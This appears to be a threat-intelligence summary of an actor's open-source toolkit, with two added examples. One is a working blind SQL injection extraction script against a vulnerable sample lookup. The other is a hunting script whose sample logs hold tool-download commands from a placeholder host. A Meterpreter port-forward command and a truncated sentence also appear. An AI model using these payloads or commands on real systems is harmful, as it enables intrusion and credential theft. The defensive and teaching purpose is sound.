By analyzing tools, logs and artifacts left open to the internet, we were able to profile the threat actor and their victims.
Based on those artifacts, we assess with moderate confidence that the majority of the threat actor's activity was not financially motivated.
The threat actor relied solely on open-source tools and frameworks.
The threat actor targeted escort service websites in the same countries they were targeting government infrastructure.
The threat actor used nuclei for vulnerability scanning and for identifying the software running on targets.
SQL Injection - The threat actor used sqlmap and ghauri to conduct SQL injection attacks against target hosts.
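To make concrete what sqlmap and ghauri automate against a site like the ones described above, here is an added example (not code from the report or from either tool): a deliberately vulnerable lookup built by string concatenation, the same lookup hardened with a bound parameter, and a boolean-based blind extraction loop that recovers a value from the database one character at a time using nothing but the page's true/false behaviour. The in-memory SQLite database, table, usernames and hash values are constructed for this example.

```python
import sqlite3

# Constructed stand-in for a target site's backend (sample data for this example,
# not anything recovered from the threat actor's server).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (
            id INTEGER PRIMARY KEY,
            username TEXT NOT NULL,
            password_hash TEXT NOT NULL,
            is_admin INTEGER NOT NULL
        );
        INSERT INTO users (username, password_hash, is_admin) VALUES
            ('alice', 'hash-alice', 0),
            ('bob',   'hash-bob',   0),
            ('admin', 'hash-admin', 1);
    """)
    return conn


def lookup_vulnerable(conn, username):
    # Deliberately vulnerable: the attacker-controlled value is spliced into the SQL text,
    # so a quote in the input changes the structure of the query.
    sql = "SELECT username, is_admin FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, username):
    # Hardened form: a bound parameter is only ever treated as data, never as SQL.
    sql = "SELECT username, is_admin FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


def boolean_oracle(conn, probe):
    # Boolean-based blind injection observes one bit per request: did the page
    # behave as if a matching row existed?
    return len(lookup_vulnerable(conn, probe)) > 0


def extract_hash_blind(conn, user="admin",
                       charset="abcdefghijklmnopqrstuvwxyz0123456789-"):
    # Recover users.password_hash for `user` one character at a time using only the
    # true/false oracle. sqlmap and ghauri do exactly this, just faster and across
    # several injection techniques (error-, UNION- and time-based as well).
    recovered = ""
    while True:
        for ch in charset:
            # AND binds tighter than OR, so the injected comparison decides the
            # result for every row: all rows come back if it is true, none if false.
            probe = (
                "x' OR (SELECT substr(password_hash, {pos}, 1) FROM users "
                "WHERE username = '{user}') = '{ch}' AND '1' = '1"
            ).format(pos=len(recovered) + 1, user=user, ch=ch)
            if boolean_oracle(conn, probe):
                recovered += ch
                break
        else:
            # No character matched: substr() returned '' past the end of the value.
            return recovered


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, payload x' OR '1'='1 :", lookup_vulnerable(db, "x' OR '1'='1"))
    print("safe,       same payload        :", lookup_safe(db, "x' OR '1'='1"))
    print("blind extraction of admin hash  :", extract_hash_blind(db))
```

The only difference between the two lookups is whether the value travels inside the SQL string or as a bound parameter; every payload that works against `lookup_vulnerable` returns an empty result from `lookup_safe`. The blind loop needs roughly one request per candidate character per position, which is why a sqlmap or ghauri run against a site shows up in web logs as hundreds of near-identical requests whose parameter differs by a few characters.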
We observed the threat actor create a directory named exploits, clone a public exploit from GitHub into it, and then execute that exploit against a target.
On another occasion the threat actor again cloned an exploit from GitHub and then attempted to exploit the target with it.
As discussed further in the Command and Control section, the threat actor used multiple frameworks, including Metasploit and Sliver.
The threat actor generated numerous Sliver beacons over the time they used the server.
The threat actor used Sliver's execute-assembly command to run SharPersist in memory.
The threat actor used Sliver to upload modified versions of.
The threat actor used Meterpreter's built-in getsystem command, which tries a series of named-pipe impersonation and token-duplication techniques to elevate the current session to NT AUTHORITY\SYSTEM (ATT&CK T1134.001, Access Token Manipulation: Token Impersonation/Theft).
On several of the targets, after gaining shell access, the threat actor ran LinPEAS to enumerate privilege escalation paths on the exploited host.
The threat actor renamed tools and payloads to masquerade as legitimate files and blend in on the systems to which they gained access.
The threat actor used several techniques to obtain password hashes and credentials from the target hosts.
In one instance, the threat actor used certutil to download PowerView and then ran a series of Active Directory discovery commands with it.
The threat actor used Meterpreter's portfwd command to establish a reverse port forward to the C2 IP: portfwd add -R -p 89474 -l 4453 -L 192.169.6.122. With -R, the -p value is the port the compromised host listens on and -L/-l are the host and port that traffic is forwarded to; note that 89474 exceeds the maximum TCP port of 65535, so a listener could not actually bind to the value as recorded.
The threat actor routinely wrapped commands in torify to proxy their traffic through the Tor network.
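Most of the tooling footprint on this page (nuclei, sqlmap and ghauri invocations, the exploits directory and GitHub clones of exploit code, LinPEAS, certutil downloads of PowerView, and torify-wrapped commands) is visible in ordinary process-creation telemetry. The following hunting script is an added example and not part of the original report: the log lines are constructed, the hostnames, users, the IP 203.0.113.10 and the CVE-0000-00000 repository name are placeholders, and the rule names are ours.

```python
import re

# Constructed sample telemetry (not from the report): one process-creation event per
# line, formatted as "<host>|<user>|<cwd>|<command line>". Hosts, users, the IP and
# the CVE-0000-00000 repository name are placeholders.
SAMPLE_EVENTS = """\
web01|www-data|/tmp|torify sqlmap -u http://203.0.113.10/item?id=1 --batch --dbs
web01|www-data|/tmp|mkdir exploits
web01|www-data|/tmp/exploits|git clone https://github.com/example/CVE-0000-00000-poc
web01|www-data|/tmp/exploits|torify python3 CVE-0000-00000-poc/exploit.py http://203.0.113.10
db02|postgres|/tmp|curl -s http://203.0.113.10/linpeas.sh -o /tmp/lp.sh
db02|postgres|/tmp|sh /tmp/lp.sh -a
scan01|root|/root|nuclei -l targets.txt -t http/technologies/
ws01|CORP\\jdoe|C:\\Users\\jdoe|certutil.exe -urlcache -split -f http://203.0.113.10/PowerView.ps1 pv.ps1
ws01|CORP\\jdoe|C:\\Users\\jdoe|certutil.exe -verify cert.cer
dev03|builder|/src|git clone https://github.com/example/docs
"""

# Command-line rules, each tagging one behaviour described in the report.
RULES = [
    # torify prefixes a command so its traffic is proxied through Tor.
    ("tor_proxied", re.compile(r"^\s*torify\s+", re.I)),
    # The scanning and SQL injection tooling the actor relied on.
    ("offensive_tooling", re.compile(r"\b(?:nuclei|sqlmap|ghauri)\b", re.I)),
    # Staging directory the actor created before cloning exploits into it.
    ("exploits_dir", re.compile(r"\bmkdir\b.*\bexploits\b", re.I)),
    # LinPEAS by name, in a download URL or a script name.
    ("linpeas", re.compile(r"linpeas", re.I)),
    # certutil abused as a downloader: -urlcache together with a URL.
    ("certutil_download",
     re.compile(r"\bcertutil(?:\.exe)?\b.*-urlcache\b.*https?://", re.I)),
]

GIT_CLONE = re.compile(r"^\s*(?:torify\s+)?git\s+clone\s+(\S+)", re.I)
EXPLOIT_REPO = re.compile(r"cve-\d{4}-\d+|exploit|poc", re.I)


def parse_event(line):
    host, user, cwd, cmd = line.split("|", 3)
    return {"host": host, "user": user, "cwd": cwd, "cmd": cmd}


def classify(event):
    """Return the list of rule tags that fire for one process-creation event."""
    tags = [tag for tag, rx in RULES if rx.search(event["cmd"])]
    m = GIT_CLONE.match(event["cmd"])
    if m:
        # A clone is suspicious when it lands in an 'exploits' directory or the
        # repository name itself advertises exploit or proof-of-concept code.
        url = m.group(1)
        basename = re.split(r"[\\/]", event["cwd"].rstrip("\\/"))[-1].lower()
        if basename == "exploits" or EXPLOIT_REPO.search(url):
            tags.append("exploit_clone")
    return tags


def hunt(raw_log=SAMPLE_EVENTS):
    """Return (line_number, host, tags) for every event that matched at least one rule."""
    hits = []
    for n, line in enumerate(raw_log.splitlines(), 1):
        if not line.strip():
            continue
        ev = parse_event(line)
        tags = classify(ev)
        if tags:
            hits.append((n, ev["host"], tags))
    return hits


if __name__ == "__main__":
    for n, host, tags in hunt():
        print(f"line {n:2d} {host:7s} {', '.join(tags)}")
```

Two points the sample data is built to show. First, the renamed LinPEAS copy (`sh /tmp/lp.sh -a`) slips past the name-based rule even though the download that preceded it did not, which is exactly the masquerading described above; pairing the download rule with a "script executed from /tmp shortly after a download" rule closes that gap. Second, the benign `certutil -verify` and the documentation clone produce no hits, so the rules are specific enough to run against real volumes without drowning an analyst in false positives.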
This Cyber News was published on thedfirreport.com. Publication date: Mon, 18 Dec 2023 01:43:05 +0000